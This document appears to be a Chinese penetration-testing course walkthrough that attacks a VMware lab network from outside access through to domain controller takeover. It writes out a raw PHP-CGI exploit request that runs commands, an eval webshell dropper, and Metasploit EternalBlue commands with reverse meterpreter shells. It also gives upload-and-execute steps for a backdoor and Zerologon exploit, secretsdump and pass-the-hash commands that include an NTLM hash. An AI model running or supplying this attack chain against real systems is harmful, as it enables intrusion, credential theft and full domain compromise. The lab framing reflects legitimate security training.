DAY196-vpc1-小迪安全

相关帐号密码见虚拟机描述：

例课程演示：

vmware网卡设置：

vmware8/NAT 对应192.168.139.0网段

vmware2对应192.168.2.0网段

vmware3对应192.168.3.0网段

vmware10对应192.168.10.0网段

记得开启里面的xampp和weblogic服务在做实验

那么网络配置如下：

Windows Server 2012

配置NAT一块 + vmware2一块

Windows 7

配置vmware2

Windows 10

配置vmware2 + vmware3

Windows Server 2012 R2（weblogic 单机）

配置vmware3 + vmware11

Windows Server 2012-WEB

配置vmware11

Windows Server 2016-AD-2016

配置vmware11

一、外网打点PHP-GGC

1、cve-2024

https://blog.csdn.net/huangyongkang666/article/details/139659619

Poc

POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+allow_url_include%3Don+%ADd+auto_prepend_file%3Dphp%3A//input HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/122.0

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Host: 127.0.0.1

Content-Type: application/x-www-form-urlencoded

Redirect-Status: 1

Content-Length: 22

<?php system('dir');?>

2、上线木马到哥斯拉

<?php file_put_contents('..\htdocs\xd.php','<?php eval($_POST["pass"]);?>');?>

3、上线哥斯拉

上传木马

3、端口扫描，扫描存活主机

目标2.128-win7

由于防火墙的原因扫描的端口没有扫描到

二、ms17010攻击

1、msf17010扫描

2、转发到msf

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 0.0.0.0     #如果为云服务，则填写公网ip地址

set lport 1112        #cs上设置的

3、msf利用ms17010

run autoroute -p

run post/multi/manage/autoroute

 扫描模块位置：

 auxiliary/scanner/smb/smb_ms17_010    

 攻击代码位置：

 exploit/windows/smb/ms17_010_eternalblue

 exploit/windows/smb/ms17_010_eternalblue_win8  

 exploit/windows/smb/ms17_010_psexec            

 exploit/windows/smb/smb_doublepulsar_rce

!!防火墙原因，win10反向上线win7

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp   

//设置payload，后面是payload的的类型，可以通过 show payloads 命令查看

set RHOSTS 192.168.2.128     //设置被攻击者的IP

set lhost 192.168.2.140    //设置LHOST，也就是我们主机的ip，用于接收从目标机弹回来的shell，win7的2网段ip

set lport 1113

run

Msf上设置监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_http  //ms17010上一直的payload

set lhost 192.168.2.140     #kali上的

set lport 1113        #ms17010上的监听地址

use exploit/windows/smb/ms17_010_eternalblue

3、上线cs

转发上线

监听自己，反向上线

upload /home/kali/2.exe c:\\2.exe

execute -f c:\\2.exe

三、横向移动拿下win10

抓取明文报错

1、向下提权

Navicat密码凭证泄露

2、密码横向移动

创建正向监听器，由于win7限制入站不可以反向监听

四、win2012的weblogic漏洞利用

1、建立socks代理

注意为kali的

2、漏洞利用

3、转发上线

192.168.3.128

转发上线

五、win2012（10.10）横向移动

防火墙为win2012入站不允许，正向连接

六、拿下域控

Cve-2020-1472

1、建立代理

修改host文件

proxychains4 python3 cve-2020-1472-exploit.py dc 192.168.10.10

3、获取域内HASH:

proxychains4 python3 secretsdump.py dc\$@192.168.10.10 -just-dc -no-pass

python wmiexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

使用administrator的hash值来连接DC

后续下载后门上线CS或者其他方式上线CS

4、横向移动拿下域控